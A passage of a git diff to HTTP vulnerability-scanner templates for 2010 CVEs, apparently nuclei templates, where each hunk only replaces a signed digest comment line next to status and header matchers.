a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008832f4f1e1ca900d9da993c55f4c40889dc4465c649600a7210ce5cc173693d302202c0cf3b9fb9e762ac0de8b66867151286b0b19b05ab2b87285f8bf0cc8f17997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100effd0d515f25e21471913bd5a4ec145e858d69936882612bcdeadc76e8582e4b02206c919386b614ee58eac2638bc94043803479304ffb93acc47ec47e45804d9f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index b5428661733..e2a38f90b59 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e1810610a7ce0023ceed0bc58528528517c7c4239d798e825802d4d6afa6fd802201054adafc658e0248c7092fcc8c127d49cddcea9a1c30ee2bdc61c8a4d341a81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220628c36bdad49e28524bd461e6b57827885137d8fd3eddd08130698f17b7dfb3c022100ac4bc8b484a1087a2617d0b4b85ecd51507c7ed8a9a4da2ba781093b1fa28240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index a11e4eee456..d8c4cb930a1 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b18afffcb85e3d04378f326208c3c4036c590455b8afed6aac3e5bace96c8b8302206407a20e3e6db883b4102bd45035d4cc974456b2064709dfb1c23554eb16048d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203fe7ccd8089776e543e7b8c3526fe5b5a140d8ac9a1c95470fdfdc7a283a9d29022100c311b5ee1e08129b432f19db330cf72ee7c36563324be20123a1b8a92d11602a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 1ce2291c1be..df1e35b72bb 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220608584f4bafc4246ac60b2a5961cd7620331ae2efe3f413aeda09583fd623f6202210087868061fa9dfad34dc0fa7b6a1cea677ac5e2fade6a115fc5ab23c317d18b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207473ed772da72e49e1db794b7914b172f8d5892e82841b8000f9a666a280fb4a022021fe80f0672abed41869e9560c5b5b9bdb2fe53c42921b262597a1b25c833c08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index d0e9186d006..565bf455504 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206e9654d835a67888b9ba3ddfee06d44902fe61f146fcdd94a0030ef3fbad768a02201bad080dfd7fa66c75c067a3b3bf228304dfdedaa1aa69b57ad28397a36464d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb9c3454f2ef156a669c262d2f46ce1ac81d61c3af3c7102dbbd7279907356a8022100eccbaae75a17f79b6195cb7d7b4e8582c198d872d2995db2133ac5390b99c5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index c1fac8a2a4c..d4c4e1598f2 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063404b2fcaa1307f7c84856352b0b54f9b6119b52509bbead0fee02e540c233302203e060c2ef513735f358e4c4697abe7bb260b9ba5c8bc1c3823391be09b89450b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab3797ed92af88a8c71167dd5bf5e17839a8fabb240bfd45ca00c749fda4f0ab02205045cc8ba336fde2fb6776a007cacec539b47ba6c22d8fe4466305da611b7f80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index b43d46e5796..f22a94d1380 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093ea39331ed9c38014012e2eeac30dce8a456d061728754a60e43b94702fe8a00220735cccd55ec6e06aa9c0a800ff83e2de1f28953742dc07ed9465b2bd544ac73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5a0bf1c141458f86c5564e6442e3597337d087dcb1aa0e4905631c238af6bba022100d54a5b070ca59d022b394f9975e5e7212cb4ca786b2e69f3fdd0c9dedee79c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index e84b5467576..eb45afa6c97 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220726bb6d07d16541d9f199aafe67133e0d4bb18af8588bd6836fad4cd1f8506ac022100ebba677294153fd4ec09aa99decf4cce3acc52da7ddc30f1dae3cb1267c3888c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9db0e7aae59afd41d1404231da1af26e3a1f0538126cd71d53470e59048b14302200e13e5487a7c19ea44d339da0e91275dc76f4727be0f9347ce6677b21f569778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index ffab614a34c..d99395ec3d5 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bece6297e4c9e3fa22ddbf4b7221dd76967bd6b756372dd9ee4e662722db8b1a022100f7a43c6533b0421672bcf8421ee77f1c29e002d3d3e953dcc797221779b2f8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100962f4849ff5c593c8c75a972679ce0d3eb49fd4448880e98162c272efb5b19350220160660108c5712f5bc71f5672204b377188961c91b8bfe81d26c6021c1385d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 427d4e636af..b525d3e8751 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206391337771f40fc85cac4c3b664a60ddac4aa5139857e8b5777c5b91fa71319a02210099d73a250c291ca71a9316bc0509d1291bde5fb002415586f685fb02ce36edb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f9161d87dc945366298a5e09469995cb62f550d44c7238cb4c96beb3cbef481022100dc6044d8b4ce4b7182f101ecae5dc2f96e0fe86df5e240ad07579d94b0236e91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index b09dd47d101..a120b461c09 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042e0415f748af4963e870a63040b6c1717a4d869ceed33dc4c84dd8f0c7ae87f02202f9b7c2225e2cd39e3b072f80243f24a357cd9ccabb4f4afd966b4237612e185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061fcbaae21691f61ed5894bc295b93b98ebb349bbeba76aa498dcc062663bb2a022017c2ca0d48dc3093f35951bd2c12170080d774821269fc4ccc415dfc35e547aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index d0c64c141b9..e2dc85772f6 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3111c235f671f52c845de58e156c0c0366ae37fef7a1f1ad5ef1e92444130f1022012a79feac6eb0b62fcb409ea985d1883f3101a184cf91e7e783aa756b12725e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008afbdc0656a6addd7638cc43d7bf39f2caf8babbc98f145ad9d938097b55330302204892523e4d78a08228926e72ac0d4eba36965087f2ffda975788d4fa192cd484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 9ea239ac8e5..bd533691a5c 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9b1fe39fd6a33a81ba409669359ccb3ff1a3eb66b28f5f8e50378822d03acef022100a1b43d5e47bae75164dbf6ec0ac159fe35beba5dfd639ff644cd4de178a0025d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f34c84429669a1f9eb79f615dfbb59e7047f4f25ff55d22af134ab212fe61f50220721ed70afa01cdc2c2e6a1f21e60c0ac453602ef6dcca0cc4f0c7077f30b60c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index e606bad583d..96bb80f6896 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b6f0ea5c802871964a64f23988e5d5d32a083084c552e8376d31fe7ae083ae5022100c0c72835f13f4e819d67a5eb7c4d1d4b71907ca20647d30013b0007e8163db9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207730943a864b2d7b8d9516e2e848a466239887330e4079f80c5e3b4492dd70d302207db244347db5538eb07fa16ec8bcea69af001ad35f0c7d1a87ce7b7c593a7040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 1379c2849f2..b02c3d606ec 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044b5b38841c5564390c15142958f20a69a8dcc94bb1a306801d41e29d3e8086202207729b81e4f08f55b3eb8938d3d53ec6fef1ef2b1ab9b03b8492166c212239465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100895f89799a198e990b3f0b1704aab4858a532f4f3ea3dcf07702a6582d2a2fa302201c3bfd29f3efafdd79b2f8af60b0d4d9d655dc40df759a995400a125e6c2e516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 4573e3b3c41..b014fc91c79 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220652c0555476217ee824ff00b3baeecbfbff54ff429868c2aad1ddfcc49ab905502203883c5a9ab1826c8a8a8447d81d1a823820b9ec65730ed8519936f897fc17e70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc614a294754a0017e169864514349df42f8f872a22506a24767e2ed8be90f390220165702aaf30d0312adcaf29f1730ac4cc204aa859a2ce1790ef6968dd15156b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index b46ae7bd601..1098d39ba1c 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220389d7baaff449081816af401e281c6c2824ced75a713d1af01cb92f634400c05022100cf6ca13b8f9b637b09418f584c74b3c075d73f2ca3d0222d5b426c0620aabacd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d058195072022cc1dce5109d174b8248aada19108b55ebc886a1ec1c946c4ec702207d509d92930cebaffca1ea215959f038672f3eb2bdfe6b9022bea0ef33df38f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index a4fdb630957..376f25e14c3 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd1899c07c4ea832d44dee0755fb3914f113ff2032380fb7bd19a5dc5f567f890220242947f63b0d64198f72571b507bb05cb4dc7e6e9885ce14a9534e8e19e97d26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074cce5788036ea2988e38b6cc54a5b897e17190b225583230add78037ebd344402205fcaa7f3b29b43fa1e346f6195a8c49c18085ae1b2ef1a58a57b9072eb851947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 1ee808cec6d..0890d5a5e94 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed7bd0048777a44c6c85364f2aec2afe1238ede0e5e5c57d8557a8599323e4c7022100861f991c1c31a50ee30250d64e7e6f365e78ffb69c46dc90d145db0e26008866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c57b652ca0dace5e3da0dafd524c471139c6e9ebc280dcb31a5c7be9466b172c02206784008d12a8ee8e8d9bc452d85247ab992c0dad2af97381fcc81c1af5a61a90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 81f70b75f58..ef6faaad921 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220349fcd62f1f727d39e06d4a99cac8818f01def36b2263c8778d324379ae924f9022100f27551c3eacb5263974a218e660bb410ffb966cbb666f860d43da5ae23953fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f1f208426451b1dd4223c84efaad4f8c61daa7973df27170dd70d2bb4cc1f8e022100c1d041ae178f9951f0a8ef926ecaf0bc0c849b2eabdb97b1955eb8677adbc5b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index b7f8ed7b9ad..8a909d299f9 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220443ae2cb54aa00fa3dceed1c73cc3e8e981a051ba68747c7ddc0e733d3f7817b02202c79e6389f3ab4d5071f310400ac4d70c682287fb922c32d836117e3eae3c651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220009b35e0b9fe5e9066ed3bf8d71e3981e15a5b479f662ffcf5af3ea49c0112320221008830c217fc66d73990dc4bb1c1d670f31b3c33a60743231545cfff3d6d6bc7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 707e6e06cac..28849002ec1 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6eb7e1354309be39047416ea88761cb2479005f225bfe9af730103099ce930402207c92166e6477b70ed7c0656cb6a4685273818f2481396ad4b33c8a83d597eb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc0cfb149f69d3fe6a3984c37857096ed8f6d556a95041250c92279b96fe2621022034cf5074f5a07c621ddd1d1b54a9d3dea3eeb0bd96dfbc39b520131b0b5e4ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index f3796a3783f..949871eb492 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d40e8708cf8f8a2072314c9e0af0e503f69a9f85fc1a12acc299d3ac7eaf5d8e022030e41156388503891184de172976f3dabf94fe96b0be1bdeaf98b3fda4003b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f116e63b2a2d95ee210c05244be7a706c4351a78696fad38055fc755b8bd260f022039f3054fb8f3001c7fbff907caeb4563b4c0292c65a4f3b7bd631613b2de0742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index f79ad2501e8..a71b0d160d4 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210095eb9af5da80534dbf6b4665b642d8a841625f35bc602a670b2850ea9e96f35e0220534e777edd42d0e137201ad9e76941d070d67a8864ad8da8a2d2568860ff0600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061e0e398e9458d0f639a16d346facfeb5dd60b80ea794a0c2d262a37d96fa129022034bd1d44d1e7596fa7561fd164ba41605e0453709e993fd151244a536413e028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index c40e8f62a60..d3843e9bb93 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a9db68ab81cb561f458501746fb549753f844ce63234d42f220cdbdfc4da9a6a0220533dde46b3f9b030c3872dd2cefd1b2520ac230504dac55a59a21eb1d2efcc29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f572e604f171d121b84f4f0c29e90b2120afdbc1a5550c16a19876b144e8c8c02210099a921142eec8bdc18670297ae2041490ac884e9b8c7b20ce0c2ac2f7c3d84dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 1a677d90c07..a4b2592d121 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb4d9b63dd97efaf0c724ef12085dd789498c166e959c71e2051a98d38f9146902207fff9966096d728a442667f94e98cc9cd4eebaa737a86a1ceba742edbf84a2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220614bb9d69431958824059c7a1d8184573e838f3d93814f97623e4d127f5342440220066500d8a8fe9b5a85930cdc2ee7813681007a8295349f8f7a55cbad50918df2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index d21a165f12c..473799cb4c0 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022042c3afa65f0c4f86b7eec17c57f2a42b85add2cf36572cfc7d6edf911ed48b92022100ecdeadc386cc5fb7c64b13d46c1868dbd578780c8cfe6e913e96682e9b41a47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068adbaa482e56ed97e6a7118b784085dfc2db5c6beca5deee7f383fcf9a459b4022100fa74eea2c385874c3dc75993b96b94cf548f8e79756e6b06ae34f2e92f1cb9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index d4b98b6cead..9e82415d5f5 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220539c024d4f1492c77118cd79a855955de639340cbfff2a47142c67c8ea9204440220415027baecbe926efb9d4fe87c55ffd2c4f29c6727c107cbdb859acd9dd4201c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c74c459314d95312eb08636de23e942d4b88e4699b101129669c4473a95d848c022100a0c943d3109df7ee36c9fe1e2650a2bba0fd0fcdf044c75f875aec758895d8ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 6591a9e9144..2c034b5c5c1 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220396c8d0a698b9c3c0b0a1720326981331b9cfc87ecd2ad7e77095b766aa9af4a0221008fc4b56825a920d57c1025511248fa1ed25a87ce73a06ba3f0a3dea3876ea2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b0c6fc8b276d2d1634020cd73ab703e2fc03602c940c7109d03e9cdd1979daa022016957da529a1d11efd3bd709702f6e097c0378a36ad3eed97011cfd2f90583ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 75de21c279d..c6e2b308777 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220536d298b8e38790e0ddf1a149d044e7b934bea5cb7262ec727da00026a1bcf37022017421b1136ecbd48423a9e67db768c7abefd10768fc7bcad73040efaf2c38ed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abf739423d535a00ab2e05122b037c12b14c17fe28f3bb6da47c007b327f58c602210086a01961e38b4395e8ef3e54177dc557538fb6ca298c7857088b92beb904cbef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 19fad6697db..9cc2e3d0375 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fdb78b437d163ec1f1eb8340b3e0ef37ebbc415e969d23e546fb2f8de104b7e6022100a27aa03811e12dfdd45b161a80f1335cc914868c55444c3dd04c60c53e3ecdd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203250ec8db03b0e8d9203509df7021b8d0b6aea07ab705ba8cd74106450904a64022070ca50390f51af0e076c2a3fcc9bef8face575ce3d83fc45de40214816fee0bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index be1fb892dea..c877c438a2b 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a60480ae3f24238058a5cf0999318815d9ddebb86b08e95dd5d6f221f919d4f022100d3bc62838968e64d636473f5b94fb97b5708ff262c22f464c937826a9145adc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e66a25815e9001ab050b3ba29cfb0c2d774af96c6c63ceb534cfb9bb6ff2ead022100de40e39de927efca463e030e577772a8732bff42b8fedb7ff82bf583322f2052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index e923c9ee484..d80f8a619a0 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022075fdcf3ed36aab24ff155d4afb83aa2ed2b46065d9c06a97b8fee40fbe37babc0221009a3f27a8195cc11d4dce7e86be4252573c6f8d5cbf337a9c7d182b9e91c04cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220692546b7187637f36bc0a57f55352bd2838405c25d8d03f535efa3ea0dc78baa0221008ce66ba4fc24246e67c06a4967ccc9a82f8bf439cf02adaaa53c20ab58e02429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 8c25c39e465..1b6e4255b4e 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201c3c3d40f571f956ed3df5c6c5dbca840080b3bac4c4efb613f0d65b0616b6270220331239db562392653125c5ca2c026f335201143099562ac895f0ebe651a9d6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d968498b72cd1148cfb00f8c1da43fecbee301137454195a8724b502149101c3022100fe9b78ee3d9cced8cf068ec3cf3bef8fea285b0440c6542bcd2186ccf4858473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 1cf12b45347..1c882c8974e 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -51,4 +51,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022100fa4a346241829ae6e83b2c67e858a36075e0b6456c6d73b8a2f318881b309ee30220581bdd2e8c3f350dbeb9b3e8673ac5ce7792a7eda340da5793bd34be58f2f1cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ff5027844bf5d6c204f1b2e1852d96375df1bacfb6593fd7c888c7c79b6f611022100f04dfea18861ce686ebfcee9bbce34e150e37b84d1e6e023d03827b30f43b5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 18a13fa97f9..7e7fb3be8e7 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022078d408fb23232fdd07c6b3bfc4612af49433d999df528e49fb916a44eb848e8e022100fcad40418508cf362dd3f8cc50946059f44f8e2949f8e0cbd749ed12bf6edc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f750d2e58808ba06c165265133f7c3bebf9f100ce595c658b176e54fca41128f022100d3fb919196e26698d64dddddea10cb960579416cb018fc3525762d1ecba4e200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index d023aa9956f..70fb7b98d5a 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205568c94d3474c336d0eb94b26a2a686e986499aa0cd22b6d1196061c2308b18502204a5bdf9a90b8b8178a9e50caedd0e764769f81f08b5d843d01c8ae2343e9b350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 